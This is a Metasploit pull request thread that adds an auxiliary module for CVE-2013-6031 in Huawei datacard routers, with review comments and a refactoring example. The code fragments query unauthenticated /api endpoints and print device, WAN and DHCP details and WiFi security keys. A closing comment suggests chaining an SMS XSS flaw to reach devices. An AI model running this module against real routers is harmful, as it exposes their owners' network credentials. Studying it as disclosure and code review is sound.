
Huawei SOHO router information disclosure, cve-2013-6031 #3019

Merged
merged 1 commit into from

7 participants

Tom James Josh wvu-r7 Juan Vazquez HD Moore Tod Beardsley jvennix-r7
Tom James

Add VU#341526 (CVE-2013-6031): Huawei Datacard Information Disclosure vulnerability.

modules/auxiliary/admin/huawei/huawei_wifi_info.rb
((25 lines not shown))
+ 'tomsmaily [at] aczire.com', #Msf module
+ ],
+ 'References' =>
+ [
+ [ 'CVE', '2013-6031' ],
+ # [ 'OSVDB', '6031' ],
+ # [ 'BID', '6031' ],
+ # [ 'URL', 'http://seclists.org/bugtraq/2013/Nov/6031' ],
+ ],
+ 'DisclosureDate' => "Nov 11 2013" ))
+
+ register_options(
+ [
+ OptString.new('PASSWORD', [ true, 'The password to reset to', 'admin']),
+ OptBool.new('GAP', [false, 'Attempt admin password reset using wifi password.', false]),
+ ], self.class)
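Review bot: the three commented-out reference lines (OSVDB, BID and the seclists URL) all reuse the CVE's number '6031' and look like unverified placeholders; drop them rather than ship dead reference entries. The PASSWORD option is described as 'The password to reset to' and GAP as an admin password reset attempt, which goes beyond the information disclosure the title promises; either the module performs a reset, in which case the name and description should say so, or these options are unused and should be removed.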

where are these options used?

modules/auxiliary/admin/huawei/huawei_wifi_info.rb
@@ -0,0 +1,506 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+require 'base64'
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "Huawei Datacard, CSRF Information Disclosure Vulnerability",
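Review bot: the download URL in the header comment, `http//metasploit.com/download`, is missing the colon after the scheme; it should read `http://metasploit.com/download`. The same typo is repeated in every later revision of the header.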

Is this a CSRF exploit?

Juan Vazquez Collaborator

As @aczire, I don't think this module is exploiting CSRF, since it's interacting with the server directly, without any user/browser interaction. So I would ask to delete the CSRF from the title here. (Even when probably the app could be vulnerable to CSRF, this module isn't abusing it).

Josh
Collaborator

@aczire can you add a description to your pull request, it's very unlikely to get merged w/o one. Also, you can get some hints for writing a good description from CONTRIBUTING.md

wvu-r7
Collaborator

@aczire: Please complete review.

Tom James

@kernelsmith Does that mean I need to rewrite the description? Added a description to the pull request anyway. @jvennix-r7 the option to set password bruteforce has been removed from the module. @wvu-r7 Please let me know if anything else needs to be done.

Juan Vazquez
Collaborator

Module isn't msftidy compliant; it should be made msftidy compliant before we can go ahead. Thanks!

modules/auxiliary/admin/huawei/huawei_wifi_info.rb
((39 lines not shown))
+ #Gather basic router information
+ get_router_info
+ print_status("")
+ get_router_mac_filter_info
+ print_status("")
+ get_router_wan_info
+ print_status("")
+ get_router_dhcp_info
+ print_status("")
+
+ print_status("Now trying to get WiFi Key details...")
+ res = send_request_raw(
+ {
+ 'method' => 'GET',
+ 'uri' => '/api/wlan/security-settings',
+ }, 25)
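Review bot: the `print_status("")` calls between the gather methods exist only to space the output, and each one prints a line carrying the `[*]` prefix; `print_line('')` gives a real blank line. The explicit 25 second timeout passed to `send_request_raw` also departs from the framework default without a stated reason.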
Juan Vazquez Collaborator

Please allow send_request_raw to use its default timeout unless there is a good reason to modify it.

Juan Vazquez
Collaborator

Please report interesting information to the database, see Msf::Auxiliary::Report

Tod Beardsley todb-r7 added the module label
Tom James aczire changed the title from Huawei SOHO router information disclosure and csrf, cve-2013-6031 to Huawei SOHO router information disclosure, cve-2013-6031
modules/auxiliary/admin/huawei/huawei_wifi_info.rb
((2 lines not shown))
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+require 'base64'
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Report
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "Huawei Datacard, Information Disclosure Vulnerability",
+ 'Description' => %q{
+ This module exploits an un-authenticated information disclosure vulnerability (CWE-425) in Huawei
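Review bot: 'un-authenticated' should be 'unauthenticated', and the description line runs well past the width of the rest of the file; wrap the `%q{}` text so each line stays close to the surrounding code's width.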
Juan Vazquez Collaborator

Metasploit modules support CWE as references. So it's better to add a reference than write it in the description.

modules/auxiliary/admin/huawei/huawei_wifi_info.rb
@@ -0,0 +1,522 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+require 'base64'
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Report
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "Huawei Datacard, Information Disclosure Vulnerability",
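Review bot: `require 'base64'` is pulled in at the top of the file, but nothing in the visible hunk uses Base64; if the module never decodes anything, remove the require, and if it does, it is worth a comment saying where.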
Juan Vazquez Collaborator

Huawei Datacard Information Disclosure Vulnerability

modules/auxiliary/admin/huawei/huawei_wifi_info.rb
((11 lines not shown))
+ include Msf::Auxiliary::Report
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "Huawei Datacard, Information Disclosure Vulnerability",
+ 'Description' => %q{
+ This module exploits an un-authenticated information disclosure vulnerability (CWE-425) in Huawei
+ SOHO routers. The module will gather information by accessing the /api pages where
+ authentication is not required, allowing configuration changes
+ as well as information disclosure including any stored SMS.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Jimson K James.',
+ 'tomsmaily [at] aczire.com', #Msf module
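Review bot: the description says the /api pages allow 'configuration changes as well as information disclosure', but the module as named only gathers information; state what the module itself does and keep claims about what the vulnerability permits separate from that. The trailing period in the author entry 'Jimson K James.' should also go.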
Juan Vazquez Collaborator

No spaces around [at]: tomsmaily[at]aczire.com

modules/auxiliary/admin/huawei/huawei_wifi_info.rb
((16 lines not shown))
+ 'Description' => %q{
+ This module exploits an un-authenticated information disclosure vulnerability (CWE-425) in Huawei
+ SOHO routers. The module will gather information by accessing the /api pages where
+ authentication is not required, allowing configuration changes
+ as well as information disclosure including any stored SMS.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Jimson K James.',
+ 'tomsmaily [at] aczire.com', #Msf module
+ ],
+ 'References' =>
+ [
+ [ 'CVE', '2013-6031' ],
+ [ 'URL', 'http://www.kb.cert.org/vuls/id/341526' ],
Juan Vazquez Collaborator

['US-CERT-VU', '341526']

modules/auxiliary/admin/huawei/huawei_wifi_info.rb
((23 lines not shown))
+ 'Author' =>
+ [
+ 'Jimson K James.',
+ 'tomsmaily [at] aczire.com', #Msf module
+ ],
+ 'References' =>
+ [
+ [ 'CVE', '2013-6031' ],
+ [ 'URL', 'http://www.kb.cert.org/vuls/id/341526' ],
+ [ 'URL', 'http://www.huaweidevice.co.in/Support/Downloads/' ],
+ ],
+ 'DisclosureDate' => "Nov 11 2013" ))
+
+ register_options(
+ [
+ Opt::RHOST("mobilewifi.home")
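Review bot: the RHOST default `mobilewifi.home` only resolves through the device's own DNS, so anyone running the module from a network where the router is not the resolver gets a name lookup failure instead of a clear error; either leave RHOST without a default or document in the description that the name is the device's internal hostname and that the device IP may have to be supplied instead.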
Juan Vazquez Collaborator

Is it hardcoded name for the device or something like that?

Tom James
aczire added a note

yup, router's internal DNS resolver resolves this to local router ip.

wvu-r7 Collaborator
wvu-r7 added a note

Cute. Kinda like routerlogin.net.

Tom James
aczire added a note

yup, the Huawei way!

modules/auxiliary/admin/huawei/huawei_wifi_info.rb
((48 lines not shown))
+ get_router_mac_filter_info
+ print_status("")
+ get_router_wan_info
+ print_status("")
+ get_router_dhcp_info
+ print_status("")
+
+ print_status("Now trying to get WiFi Key details...")
+ res = send_request_raw(
+ {
+ 'method' => 'GET',
+ 'uri' => '/api/wlan/security-settings',
+ })
+
+ #check whether we got any response from server and proceed.
+ if not res
Juan Vazquez Collaborator

unless res

modules/auxiliary/admin/huawei/huawei_wifi_info.rb
((54 lines not shown))
+
+ print_status("Now trying to get WiFi Key details...")
+ res = send_request_raw(
+ {
+ 'method' => 'GET',
+ 'uri' => '/api/wlan/security-settings',
+ })
+
+ #check whether we got any response from server and proceed.
+ if not res
+ print_error("Failed to get any response from server!!!")
+ return
+ end
+
+ #Is it a HTTP OK
+ if (!(res.code == 200))
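Review bot: `if (!(res.code == 200))` is a double negation wrapped in redundant parentheses; `unless res.code == 200` says the same thing directly. The error strings ending in '!!!' should be toned down to a single plain sentence, and the comment `#Is it a HTTP OK` should read `# Is it an HTTP 200` with a space after the hash.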
Juan Vazquez Collaborator

unless res.code == 200

modules/auxiliary/admin/huawei/huawei_wifi_info.rb
((40 lines not shown))
+
+ end
+
+def run
+
+ #Gather basic router information
+ get_router_info
+ print_status("")
+ get_router_mac_filter_info
+ print_status("")
+ get_router_wan_info
+ print_status("")
+ get_router_dhcp_info
+ print_status("")
+
+ print_status("Now trying to get WiFi Key details...")
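Review bot: `def run` sits at column 0 while the method `end` immediately above it is indented one level deeper; the indentation is inconsistent across the file and should be normalised to two spaces per level.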
Juan Vazquez Collaborator

I've the feeling it should be a method too.

modules/auxiliary/admin/huawei/huawei_wifi_info.rb
((156 lines not shown))
+ rescue::Exception => e
+ print_status("Ooooops: #{e.class} #{e}")
+
+ #end run
+ end
+
+def get_router_info
+
+ print_status("Attempting to connect to #{rhost} to gather basic device information...")
+ res = send_request_raw(
+ {
+ 'method' => 'GET',
+ 'uri' => '/api/device/information',
+ })
+
+ #check whether we got any response from server and proceed.
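Review bot: `rescue::Exception => e` catches every exception, including interrupts and the framework's own control-flow exceptions, and turns them into an 'Ooooops' status line; rescue the specific errors expected here (for example `::Rex::ConnectionError`) and let everything else propagate, and report the failure with `print_error` rather than `print_status`.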
Juan Vazquez Collaborator

You make the same checks for every response -> res, code, Server header. It's worth refactoring so the code isn't copied in several places.

modules/auxiliary/admin/huawei/huawei_wifi_info.rb
((181 lines not shown))
+ print_error("Did not get HTTP 200, URL was not found. Exiting!")
+ return
+ end
+
+ #Check to verify server reported is a Huawei router
+ if (res.headers['Server'].match(/IPWEBS\/1.4.0/i))
+ print_status("Server is a Huawei router! Grabbing info\n")
+ else
+ print_error("Target doesn't seem to be a Huawei router. Exiting!")
+ return
+ end
+
+ print_status("---===[ Basic Information ]===---")
+
+ # Grabbing the DeviceName
+ if res.body.match(/<DeviceName>(.*)<\/DeviceName>/i)
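Review bot: `res.headers['Server'].match(...)` raises NoMethodError when the Server header is absent; call `.to_s` on the header or check for its presence first. The fingerprint regex `/IPWEBS\/1.4.0/i` leaves the dots unescaped and pins a single firmware version, so other firmware builds fail the check; escape the dots and consider matching only the `IPWEBS/` prefix. The DeviceName regex `(.*)` is greedy and would run past the closing tag if the element repeated on one line; `(.*?)` is the safer form.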
Juan Vazquez Collaborator

All the module keeps repeating the same code again and again. I think it's worth refactoring. You can use a dictionary of Regexs and loop on every entry to find the information on the responses. Also it's worth using a method to find the information, so you don't need to repeat the code again and again.

You can use constants to store the dictionary of regexs, since I guess it's going to be static information.

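The refactoring the two review comments above ask for, one helper for the repeated response checks and a constant dictionary of regexes looped over instead of one if/match block per field, as an added example that is not the PR's code. It is plain Ruby with a constructed stand-in for the response object so it runs outside Metasploit; the Server header value and the DeviceName pattern come from the hunks, while the other field names and the sample values are assumptions.

```ruby
# Stand-in for the response object send_request_raw returns (assumption: only
# code, headers and body are used); constructed so the example runs outside Metasploit.
HttpResponse = Struct.new(:code, :headers, :body)

# Server header fingerprint taken from the PR's hunk, with the dots escaped.
HUAWEI_SERVER_RE = /IPWEBS\/1\.4\.0/i

# Static dictionary of XML fields to pull from /api/device/information.
# DeviceName is from the hunk; the other two field names are assumed for illustration.
DEVICE_INFO_FIELDS = {
  'DeviceName'      => %r{<DeviceName>(.*?)</DeviceName>}i,
  'SerialNumber'    => %r{<SerialNumber>(.*?)</SerialNumber>}i,
  'SoftwareVersion' => %r{<SoftwareVersion>(.*?)</SoftwareVersion>}i,
}.freeze

# The three checks the module repeated after every request, in one place:
# got a response, HTTP 200, and a Server header that identifies a Huawei device.
# Returns [true, nil] or [false, reason] so the caller can print_error and return.
def valid_huawei_response?(res)
  return [false, 'no response from server'] if res.nil?
  return [false, "unexpected HTTP code #{res.code}"] unless res.code == 200
  server = res.headers['Server'].to_s # .to_s guards against a missing header
  return [false, 'Server header does not identify a Huawei router'] unless server =~ HUAWEI_SERVER_RE
  [true, nil]
end

# Loop over the regex dictionary instead of one if/match block per field.
# Fields that do not match are left out of the result rather than reported as empty.
def extract_fields(body, fields)
  fields.each_with_object({}) do |(name, re), out|
    m = body.match(re)
    out[name] = m[1].strip if m
  end
end

# Constructed sample response (not captured from a device).
SAMPLE_RES = HttpResponse.new(
  200,
  { 'Server' => 'IPWEBS/1.4.0' },
  '<response><DeviceName> ExampleDevice </DeviceName>' \
  '<SoftwareVersion>0.0.0-constructed</SoftwareVersion></response>'
)

if __FILE__ == $0
  ok, reason = valid_huawei_response?(SAMPLE_RES)
  abort("check failed: #{reason}") unless ok
  extract_fields(SAMPLE_RES.body, DEVICE_INFO_FIELDS).each { |k, v| puts "#{k}: #{v}" }
end
```

Inside the module, `valid_huawei_response?` would be called right after each `send_request_raw` and `extract_fields` once per endpoint with its own frozen dictionary.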
Tod Beardsley todb-r7 added the feature label
HD Moore
Owner

Given how long this has been in the queue and how much work needs to be done, we should consider closing this for now and revisiting it in the future once the module has been cleaned up.

HD Moore
Owner

Assigning to @jvazquez-r7 since the previous feedback was all his. I can take it otherwise.

Tod Beardsley
Owner

So, this has Unstable written all over it. Juan made a lot of suggestions, the contributor never responded, we don't appear to have the gear to test.

@jvazquez-r7 will implement his suggestions and unless @aczire (or anyone else!) shows up to test the changes, it'll get shuttled up to Unstable until someone cares to test.

Juan Vazquez jvazquez-r7 referenced this pull request from a commit in jvazquez-r7/metasploit-framework
Juan Vazquez jvazquez-r7 Rebase #3019 f83b87f
Juan Vazquez jvazquez-r7 referenced this pull request in aczire/metasploit-framework
Merged

Clean Huawei SOHO router information disclosure #1

Juan Vazquez
Collaborator

Hello @aczire, aczire#1 rebases (updates) your branch and cleans up your module. There are a lot of commits, only the last ones are modifications to your code.

Please feel free to review the changes and ask if you have any doubts or you would like to discuss any point. Once ready, land in your repository and this pull request will be automatically updated. Please test the modules with changes, because I just fixed code; I didn't have a device for testing. So maybe I've wasted something, please check/test carefully.

Then we'll need network captures and screenshots showing the module with changes working. And it will be ready to go! Network captures / screenshots can be sent to msfdev[at]metasploit.com

Thank you!

Tom James

@todb-r7 @jvazquez-r7 apologies for the delay. You know, personal things and work take the most priority. Well, thanks a lot for showing interest in this module. Will do the testing and report back shortly.

Tom James aczire Merge pull request #1 from jvazquez-r7/rebase_3019
Clean Huawei SOHO router information disclosure
6ec3e65
Juan Vazquez
Collaborator

@aczire thanks for landing aczire#1, please remember to send a traffic capture and screenshot of the module working to msfdev[at]metasploit.com for validation and it will be ready to go! :) Thanks!

Tom James

@jvazquez-r7 Just sent a mail to msfdev with the screenshots and packet capture. Could you please take a look at it and let me know if anything is amiss? Thanks...

Juan Vazquez
Collaborator

Thanks @aczire, got the email. I'll review the materials during the day and will update if something is missing, will land otherwise :)

Juan Vazquez jvazquez-r7 merged commit 6ec3e65 into from
Juan Vazquez jvazquez-r7 referenced this pull request from a commit
Juan Vazquez jvazquez-r7 Land #3019, @aczire's module for Huawei info disclosure
* Module for CVE-2013-6031
b4419af
Juan Vazquez
Collaborator

Data looks good, landed, thanks @aczire !

Tom James

Nice to see the module landed. Thanks a lot @jvazquez-r7 for making this happen.

For anyone looking to use the module, leverage the XSS vulnerability (CVE-2014-2968) in the SMS interface to get this module running against the datacard.
It seems other related datacards from Huawei are also vulnerable.

Commits on Jan 24, 2015
  1. Tom James

    Merge pull request #1 from jvazquez-r7/rebase_3019

    aczire authored
    Clean Huawei SOHO router information disclosure